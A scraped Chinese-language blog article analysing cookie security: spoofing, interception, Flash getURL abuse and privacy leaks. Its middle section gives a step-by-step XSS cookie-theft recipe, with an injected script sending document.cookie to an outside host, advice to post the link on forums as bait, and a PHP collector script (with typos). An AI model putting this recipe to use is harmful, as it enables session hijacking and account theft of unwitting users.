



<!DOCTYPE html><html lang=zh-CN><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="applicable-device" content="pc,mobile"><meta name="renderer" content="webkit"><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=5,viewport-fit=cover">
<title>深入分析Cookie的安全性问题</title>	
<script src="//n4.ikafan.com/assets/run_prettify.js?ac"></script>
<link rel="stylesheet" href="//n4.ikafan.com/assetsg/style.css">
<!-- <link rel="stylesheet" href="//pic.ikafan.com/staticx/shuzhiduo/1/css.grace/fontello.css?ac"> -->
<!-- <link rel="stylesheet" href="//pic.ikafan.com/staticx/shuzhiduo/1/css.grace/animation.css?ac"> -->
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?c61d51e9fdcf1d1631ddfce8df9cd119";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>
<script src="https://n4.ikafan.com/g/show.js"></script>

</head>
<div id="header" class="navbar navbar-default navbar-fixed-top header-01">
	<div class="container">
		<h1 class="logo">
			<a  href="/" title="巴特西"/>
							巴特西
			</a>
		</h1>
				<div role="navigation"  class="site-nav  primary-menu">
			<div class="menu-fix-box">
				 <ul id="menu-navigation" class="menu" >
<li><a href="/">首页</a></li>
<!-- <li><a href="/search/Hadoop/">Hadoop</a></li>
<li><a href="/search/Linux/">Linux</a></li>
<li><a href="/search/jQuery/">jQuery</a></li> -->
<li><a href="/search/Python/">Python</a></li>
<li><a href="/search/Java/">Java</a></li>
<li><a href="/search/PHP/">PHP</a></li>
<li><a href="/search/IOS/">IOS</a></li>
<li><a href="/search/Andorid/">Andorid</a></li>
<li><a href="/search/NodeJS/">NodeJS</a></li>
<li><a href="/search/JavaScript/">JavaScript</a></li>
<li><a href="/search/HTML5/">HTML5</a></li>
				</ul>					 			
			</div>
		</div>
				<!--<div class="right-nav">
				<button class="js-toggle-search"><i class="icon-search"></i></button>
		</div>-->
       
			</div>	
</div>

<div id="page-content">
	<div class="container">
		<div class="row">
			
			<div class="blog-post">
								<!--<div class="posts-top-cjtz clearfix"></div>-->
								<div class="post">
										<div class="post-title">
											<div id="title_top"></div>
<script>insertAdIfNeeded();</script>
						<h1 class="title">深入分析Cookie的安全性问题</h1>
						<div class="post_icon">
							<span class="icon-clock-1"> 2024-02-16 01:51:52 </span>
						</div>
										<div class="post-content">
											
		<p>Cookie的目的是为用户带来方便，为网站带来增值，一般情况下不会造成严重的安全威胁。Cookie文件不能作为代码执行，也不会传送病毒，它为用户所专有并只能由创建它的服务器来读取。另外，浏览器一般只允许存放300个Cookie，每个站点最多存放20个Cookie，每个Cookie的大小限制为4KB，因此，Cookie不会塞满硬盘，更不会被用作"拒绝服务"攻击手段。</p>
<p>但是，Cookie作为用户身份的替代，其安全性有时决定了整个系统的安全性，Cookie的安全性问题不容忽视。</p>
<p>（1）Cookie欺骗 Cookie记录了用户的帐户ID、密码之类的信息，通常使用MD5方法加密后在网上传递。经过加密处理后的信息即使被网络上一些别有用心的人截获也看不懂。然而，现在存在的问题是，截获Cookie的人不需要知道这些字符串的含义，只要把别人的Cookie向服务器提交，并且能够通过验证，就可以冒充受害人的身份登陆网站，这种行为叫做Cookie欺骗。&nbsp;<br />非法用户通过Cookie欺骗获得相应的加密密钥，从而访问合法用户的所有个性化信息，包括用户的E-mail甚至帐户信息，对个人信息造成严重危害。<br />（2）Cookie截获&nbsp;<br />Cookie以纯文本的形式在浏览器和服务器之间传送，很容易被他人非法截获和利用。任何可以截获Web通信的人都可以读取Cookie。&nbsp;<br />Cookie被非法用户截获后，然后在其有效期内重放，则此非法用户将享有合法用户的权益。例如，对于在线阅读，非法用户可以不支付费用即可享受在线阅读电子杂志。</p>
<p><strong>Cookie截获的手段</strong>有以下一些：</p>
<p>（1）用编程手段截获Cookie。下面分析其手法，该方法分两步完成。</p>
<p>步骤一：定位需要收集Cookie的网站，对其进行分析并构造URL。 首先打开要收集Cookie的网站，这里假设是http：//www.XXX.net，登陆网站输入用户名"&lt;Al&gt;"（不含引号），对数据进行分析抓包，得到如下代码：<br />http：//www.XXX.net/tXl/login/login.pl？username=&lt;Al&gt;&amp;passwd=&amp;ok.X=28&amp;ok.y=6；<br />将其中"&lt;Al&gt;"更换为：<br />"&lt;script&gt;alert（document.cookie）&lt;/script&gt;"再试，如果执行成功，就开始构造URL：<br />http：//www.XXX.net/tXl/login/login.pl？username=&lt;script&gt;window.open （"http：//www.cbifamily.org/cbi.php？"%2bdocument.cookie）&lt;/script&gt;&amp;passwd=&amp;ok.X=28&amp;ok.y=6.<br />其中http：//www.cbifamily.org/cbi.php是用户能够控制的某台主机上的一个脚本。需要注意的是"%2b"为符号"+"的URL编码，因为"+"将被作为空格处理。该URL即可在论坛中发布，诱使别人点击。</p>
<p>步骤二：编制收集Cookie的PHP脚本，并将其放到用户可以控制的网站上，当不知情者点击了构造的URL后可以执行该PHP代码。该脚本的具体内容如下：</p>
<div>复制代码代码如下:</div>
<div>&lt;?php&nbsp;<br />$info=getenv（"OUERY_STRING"）;&nbsp;<br />if（$info）｛&nbsp;&nbsp;<br />$fp=fopen（"info.tXt"，"a"）;&nbsp;&nbsp;<br />fwrite（$fp，!info."\n"）;&nbsp;<br />fclose（$fp）;<br />｝&nbsp;<br />header（"Location:http://www.XXX.net"）;<br />?&gt;</div>
<p>将这段代码放到网络里，则能够收集所有人的Cookie。如果一个论坛允许HTML代码或者允许使用Flash标签，就可以利用这些技术收集Cookie的代码放到论坛里，然后给帖子取一个吸引人的主题，写上有趣的内容，很快就可收集到大量的Cookie。在论坛上，有许多人的密码就是被这种方法盗走的。&nbsp;<br />（2）利用Flash的代码隐患截获Cookie。Flash中有一个getURL（）函数。Flash可以利用这个函数自动打开指定的网页，它可能把用户引向一个包含恶意代码的网站。例如，当用户在电脑上欣赏Flash动画时，动画帧里的代码可能已经悄悄地连上网，并打开了一个极小的包含有特殊代码的页面，这个页面可以收集Cookie、也可以做一些其他有害的事情。网站无法禁止Flash的这种作为，因为这是Flash文件的内部功能。<br />（3）Cookie泄漏网络隐私&nbsp;<br />Cookie导致网络隐私泄密的主要原因是：!商业利益驱动。随着电子商务的兴起和互联网上巨大商机的出现，一些网站和机构滥用Cookie，未经访问者的许可，利用搜索引擎技术、数据挖掘技术甚至是网络欺骗技术搜集他人的个人资料，达到构建用户数据库、发送广告等营利目的，造成用户个人隐私的泄漏。"Cookie信息传递的开放性。Cookie文件具有特殊的传递流程 和文本特性，在服务器和客户端之间传送未经安全加密的Cook-ie文件，易导致个人信息的泄密。</p>																
<h2>最新文章</h2>	
<ol>
						<li><a href="https://www.batexi.com/a/5qxzo7j8.html">Java开发中的高频Collections用法总结与Java平台实现源代码查看方式</a>
		</li>
						<li><a href="https://www.batexi.com/a/m96z6d4q.html">java使用动态代理来实现AOP（日志记录）</a>
		</li>
						<li><a href="https://www.batexi.com/a/rqldg4x9.html">JSP -- for循环按钮处理事件</a>
		</li>
						<li><a href="https://www.batexi.com/a/xq4oyx38.html">Chap5：32&ndash; 34</a>
		</li>
						<li><a href="https://www.batexi.com/a/93xomr09.html">【Nginx】使用Nginx做反向代理时，关于被代理服务器相应的超时设置</a>
		</li>
						<li><a href="https://www.batexi.com/a/qwd57438.html">POJ 2970 The lazy programmer（优先队列&plus;贪心）</a>
		</li>
						<li><a href="https://www.batexi.com/a/qydxnlxq.html">&lbrack;深入浅出Cocoa&rsqb;详解键值观察（KVO）及其实现机理</a>
		</li>
						<li><a href="https://www.batexi.com/a/qn1pmjx8.html">sicily 1007 To and Fro</a>
		</li>
						<li><a href="https://www.batexi.com/a/8kpjwp59.html">终于说再见了！Google Reader</a>
		</li>
						<li><a href="https://www.batexi.com/a/qy14wgjq.html">Chapter 1 First Sight&mdash;&mdash;7</a>
		</li>
						<li><a href="https://www.batexi.com/a/8kplwj79.html">Problem &colon; 1013 &lpar; Digital Roots &rpar;</a>
		</li>
						<li><a href="https://www.batexi.com/a/qwjmlvy8.html">Android群英传帝落篇&mdash;&mdash;程序人生，路漫漫其修远兮，吾将上下而求索！</a>
		</li>
						<li><a href="https://www.batexi.com/a/8kp721r9.html">centos下使用nginx 配置websocket，https升级wss协议</a>
		</li>
						<li><a href="https://www.batexi.com/a/90mglnm8.html">Java内存溢出和内存泄露后怎么解决</a>
		</li>
						<li><a href="https://www.batexi.com/a/qv2540j9.html">Android &colon; Camera2&sol;HAL3 框架分析</a>
		</li>
						<li><a href="https://www.batexi.com/a/95gg6kmq.html">Linux-学习patch命令打补丁&comma;diff命令制作补丁&lpar;3&rpar;</a>
		</li>
						<li><a href="https://www.batexi.com/a/qlln7rkq.html">通过修改配置文件修改MySQL的时区设置</a>
		</li>
						<li><a href="https://www.batexi.com/a/90rpp6m9.html">python-猜数字小练习</a>
		</li>
						<li><a href="https://www.batexi.com/a/8kodjyjq.html">C&num;基础-代码部署数据库及IIS站点</a>
		</li>
						<li><a href="https://www.batexi.com/a/8em7ryx9.html">&lbrack;手把手教程&rsqb;&lbrack;JavaWeb&rsqb;优雅的SpringMvc&plus;Mybatis整合之路</a>
		</li>
		</ol>
	

<h2>热门文章</h2>	
<ol>
									<li><a href="https://www.batexi.com/a/8z16zo19.html">Django开发网站（二）</a>
			</li>
						<li><a href="https://www.batexi.com/a/q7m2k61q.html">微软职位内部推荐-Senior Engineering Lead</a>
			</li>
						<li><a href="https://www.batexi.com/a/93x3exz9.html">在百万数据中找出重复的数据sql</a>
			</li>
						<li><a href="https://www.batexi.com/a/8z16dzx9.html">TWaver3D入门探索&mdash;&mdash;3D拓扑图之绽放的小球花</a>
			</li>
						<li><a href="https://www.batexi.com/a/q1zwmmz9.html">Windows 2008 R2系统开机时如何不让Windows进行磁盘检测？</a>
			</li>
						<li><a href="https://www.batexi.com/a/8k1r00r9.html">&lbrack;转载&rsqb;test后跟je</a>
			</li>
						<li><a href="https://www.batexi.com/a/q4y3gm3q.html">PAT-乙级-1037&period; 在霍格沃茨找零钱（20）</a>
			</li>
						<li><a href="https://www.batexi.com/a/95x7ryz8.html">CSRF攻击原理解析与对策研究</a>
			</li>
						<li><a href="https://www.batexi.com/a/qder0v79.html">UnitOfWork机制的实现和注意事项</a>
			</li>
						<li><a href="https://www.batexi.com/a/qvv3veoq.html">unity3d学习笔记（十九）--ngui制作3d人物头顶的头像和血条</a>
			</li>
			</ol>			
							
					</div>

					
<div class="next-prev-posts clearfix">
</div>
						 
				</div>
				
	<div class="clear"></div>

			</div>	
			

		</div>
</div>
</div>


<div class="clearfix"></div>
<div id="footer" class="two-s-footer">
	<div class="footer-box">
		<div class="container">
			<div class="row" style="padding-left: 15px;padding-right: 15px;">
			<div class="nav-footer">
				<a href="/">Home</a>
				</div>
				<div class="copyright-footer">
					<p>Powered By WordPress</p>
				</div>
							</div>
		</div>
	</div>
</div>
<div style="display:none">

</div>
<script src="//n4.ikafan.com/assets/js/echo.js"></script>
<script>
    echo.init({
      offset: 100,
      throttle: 250,
      unload: false,
      callback: function (element, op) {
        console.log(element, 'has been', op + 'ed')
      }
    });
 </script>
</body>
</html>
